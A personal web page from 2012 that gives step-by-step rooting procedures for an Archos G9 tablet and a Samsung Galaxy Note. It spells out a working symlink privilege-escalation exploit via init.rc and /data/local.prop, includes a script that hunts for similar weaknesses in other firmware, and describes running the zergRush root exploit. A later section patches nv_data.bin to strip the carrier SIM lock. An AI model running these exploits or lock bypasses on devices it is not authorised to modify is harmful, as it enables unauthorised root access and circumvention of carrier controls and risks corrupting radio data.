Rooting Android

Some rooting techniques I've used.

Archos G9

Rooting done 2012-04-12 on a G9 with firmware 3.2.69. Also done 2012-04-16 with firmware 4.0.5. (The technique seems to work for 4.0.6 and 4.0.7 too. Not tried, but reading init.rc from the AOS file suggests it does.)

After reading Rosenberg's website (see the links below), I wondered if a symbolic link root method was possible on the G9. (There is already an exploit out there, from Paul O'Brien, but only as a binary and with no details on how it works, so I didn't try it. No source, no trust.) I booted the G9, launched adb, and looked at /init.rc. I saw these lines:

    mkdir /data/misc/smb 0770 system system
    mkdir /data/test 0777 shell shell
    chown system system /data/misc/gps
    chown system system /data/misc/smb
    chmod 777 /data/misc/smb
    touch /data/misc/smb/fusesmb.conf
    chown system system /data/misc/smb/fusesmb.conf
    chmod 666 /data/misc/smb/fusesmb.conf

Bingo? Is /data/misc/smb/fusesmb.conf exploitable?

I removed it. No complaint. File deleted. Okay. Let's reboot. Does the file reappear? Yes! Let's remove it again, make a symlink to /data/local.prop, and reboot one more time. Can I read/write /data/local.prop? Yes! Let's put ro.kernel.qemu=1 in there and reboot. Root shell? Root shell. Game over.
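Reading init.rc by hand is how the fusesmb.conf line was found. The script below is an added example (mine, not from this page's author) that automates that reading: it prints every path that init, running as root, will chmod 666 or 777 inside a directory that init itself made world-writable, which is exactly the pattern the trick above relies on (the shell user can delete the file and drop a symlink in its place, and the next boot's chmod follows the link). The sample init.rc it writes is constructed from the eight lines quoted above plus two control lines that must not match; nothing here talks to a device.

```shell
#!/bin/sh
# Scan an init.rc for files that init (root) will chmod 666/777 inside a
# directory that init has itself made world-writable. One path per line.
find_initrc_candidates() {
    awk '
    # directories created 0777, or chmod 777 later, are writable by the
    # unprivileged shell user, so their entries can be removed and replaced
    # by a symlink before the next boot
    $1 == "mkdir" && $3 ~ /^0?777$/ { ww[$2] = 1 }
    $1 == "chmod" && $2 ~ /^0?777$/ { ww[$3] = 1 }
    # a chmod 666/777 of a file in such a directory follows a symlink,
    # making whatever the link points to world-writable
    $1 == "chmod" && $2 ~ /^0?(666|777)$/ {
        dir = $3
        sub("/[^/]*$", "", dir)
        if (dir in ww) print $3
    }' "$1"
}

# Constructed sample (not a real firmware file): the G9 lines quoted on
# this page, followed by two control lines that should NOT be reported
# because /data/misc/gps is never made world-writable.
write_sample_initrc() {
    cat > "$1" <<'EOF'
    mkdir /data/misc/smb 0770 system system
    mkdir /data/test 0777 shell shell
    chown system system /data/misc/gps
    chown system system /data/misc/smb
    chmod 777 /data/misc/smb
    touch /data/misc/smb/fusesmb.conf
    chown system system /data/misc/smb/fusesmb.conf
    chmod 666 /data/misc/smb/fusesmb.conf
    mkdir /data/misc/gps 0770 system system
    chmod 666 /data/misc/gps/gps.conf
EOF
}

# usage: sh find_candidates.sh /path/to/init.rc
if [ -n "${1:-}" ]; then
    find_initrc_candidates "$1"
fi
```

Run it against the init.rc extracted from the firmware (AOS) file before trying the procedure on another version. On the sample above it prints only /data/misc/smb/fusesmb.conf. An empty result means the trick has no obvious foothold on that firmware, not that the firmware is safe; a file under /data/test (0777, shell-owned) would be just as usable if init ever chmod'ed one there.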

Here is the procedure, as run from my linux host. The G9 is in USB debug mode (dig in the settings) and, obviously, connected to the linux computer with a USB cable. You need adb (it ships with the Android SDK, in the platform-tools directory). Why it works: at every boot, init, running as root, re-runs the lines above; the touch and chmod 666 follow the symlink, so the real /data/local.prop ends up world-writable, and init reads that file for property overrides. With ro.kernel.qemu=1 set, adbd believes it is running in the emulator and does not drop its root privileges.

    adb shell
    in the shell, type:
        rm /data/misc/smb/fusesmb.conf
        ln -s /data/local.prop /data/misc/smb/fusesmb.conf
    quit the shell (ctrl+d)
    reboot the G9, wait for it to come back
    adb shell
    in the shell, type:
        echo "ro.kernel.qemu=1" > /data/local.prop
    quit the shell
    reboot the G9
    adb shell
    you have a root shell (check with id: it should report uid=0(root))

The G9 is in a weird state while ro.kernel.qemu=1 is set, because the system then believes it is running in the emulator (sound won't work with firmware 3.2.69, for example). So, when you are done being root, clean up:

    adb shell
    in the shell, type:
        rm /data/local.prop
        rm /data/misc/smb/fusesmb.conf
    quit the shell
    reboot the G9

On your linux computer, run adb kill-server when you are done, to stop the adb server left running on the host.

Samsung Galaxy Note

Rooting done 2012-03-30 with android 2.3.6 (kernel version 2.6.35.7-N7000XXKKA-CL726566, build number GINGERBREAD.XXKKA). The phone was from SFR, bought beginning of 2012.

The goal was to sim-unlock the phone.

You need "adb" coming from the android SDK.

You need the program "zergRush", dig for it on the internet.

Become root:

  adb push zergRush /data/local
  adb shell
  in the shell, type:
    cd /data/local
    chmod 777 zergRush
    ./zergRush
  (wait for zergRush to give you root, a bit long, the adb shell will
  auto-exit when it's done)

Once you are root, you can sim-unlock.

Get the file to modify:

  adb pull /efs/nv_data.bin

Dig in the file for the offset of the 01 byte that has to become 00 to sim-unlock the phone. For me it is at 0x181469. I found it with

  od -tx1 -Ax nv_data.bin | less

(in less, type "/53 53" to search for those bytes, or "/^180" to jump to the first line starting with "180"). That line is the start of a block or something, the first 4 bytes read "SSNV":

  180000 53 53 4e 56 7c 75 f3 e8 df fd 00 0d f1 b0 6d b1

and a little further on:

  181460 ff ff ff ff ff ff ff ff ff 01 00 00 00 00 ff 95

See that 01 just before the 00s? That's what you're after: it is the tenth byte of the line, hence offset 0x181460 + 9 = 0x181469.

Compile and run the following C program.

  #include <stdio.h>
  #include <stdlib.h>

  int main(void)
  {
    /* offset of the 01 byte found with od above: change it to match yours */
    const long off = 0x181469;
    unsigned char c;
    FILE *f = fopen("nv_data.bin", "r+b");
    if (f == NULL) abort();
    /* refuse to patch anything but a 01: a wrong offset would corrupt the file */
    if (fseek(f, off, SEEK_SET) != 0 || fread(&c, 1, 1, f) != 1 || c != 0x01) abort();
    c = 0x00;
    if (fseek(f, off, SEEK_SET) != 0 || fwrite(&c, 1, 1, f) != 1) abort();
    fclose(f);
    return 0;
  }

Change the offset in fseek to match yours, then compile and run it.

Once it has run, verify that the file now has a 00 instead of the 01 at that offset (same od command as above).
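As an added example (my script, not the author's program), here is the same patch done from the shell with a safety check the C program lacks: it refuses to write unless the byte at the given offset really reads 01, keeps a copy as nv_data.bin.orig, and re-reads the byte afterwards, which covers the verification step. The offset is assumed to be passed on the command line (decimal or 0x-hex); the only tools used are od, dd and cp. The test data below is a constructed byte string, not a real nv_data.bin.

```shell
#!/bin/sh
# Print the byte of FILE ($1) at OFFSET ($2, decimal or 0x-hex) as two hex
# digits. Prints nothing if the offset is past the end of the file.
byte_at() {
    od -An -tx1 -j "$(($2))" -N 1 "$1" | tr -d ' \n'
}

# Set the byte at OFFSET to 00, but only if it currently reads 01 (the
# sim-lock flag found with od). Keeps FILE.orig as a backup and re-reads
# the byte afterwards, so the verify step cannot be forgotten.
# Returns non-zero, touching nothing, if the byte is not 01.
patch_unlock_byte() {
    nv_file=$1
    nv_off=$(($2))
    cur=$(byte_at "$nv_file" "$nv_off")
    if [ "$cur" != "01" ]; then
        echo "refusing to patch: byte at offset $nv_off is '$cur', expected 01" >&2
        return 1
    fi
    cp -p "$nv_file" "$nv_file.orig" || return 1
    # write a single NUL byte in place (notrunc keeps the rest of the file)
    dd if=/dev/zero of="$nv_file" bs=1 count=1 seek="$nv_off" conv=notrunc 2>/dev/null \
        || return 1
    [ "$(byte_at "$nv_file" "$nv_off")" = "00" ]
}

# usage: sh patch_nv.sh nv_data.bin 0x181469
if [ $# -eq 2 ]; then
    patch_unlock_byte "$1" "$2" && echo "patched $1 at $2 (backup in $1.orig)"
fi
```

If the script refuses, your offset is wrong: go back to the od listing rather than forcing the write, since nv_data.bin holds the radio's calibration and a stray byte there is not something the phone will tell you about politely.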

Then, get the user and group of original nv_data.bin:

  adb shell ls -l /efs/nv_data.bin

It says "radio radio" for me.

Remove old nv_data.bin.

  adb shell rm /efs/nv_data.bin

Push the new one:

  adb push nv_data.bin /efs/nv_data.bin

Remove the md5 file (it no longer matches the modified nv_data.bin):

  adb shell rm /efs/nv_data.bin.md5

Change owner of file (adapt, maybe it's not "radio.radio" for you):

  adb shell chown radio.radio /efs/nv_data.bin

Change the permissions too (maybe not necessary):

  adb shell chmod 666 /efs/nv_data.bin

Cleanup:

  adb shell rm /data/local/zergRush
  adb shell rm /data/local/tmp/boomsh
  adb shell rm /data/local/tmp/sh

Reboot phone:

  adb reboot

Check the locks. Dial: *#7465625# (don't forget the '*' and the two '#').

Links


Contact: sed@free.fr

Created: Fri, 13 Apr 2012 09:46:41 +0200
Last update: Mon, 25 Jun 2012 10:55:40 +0200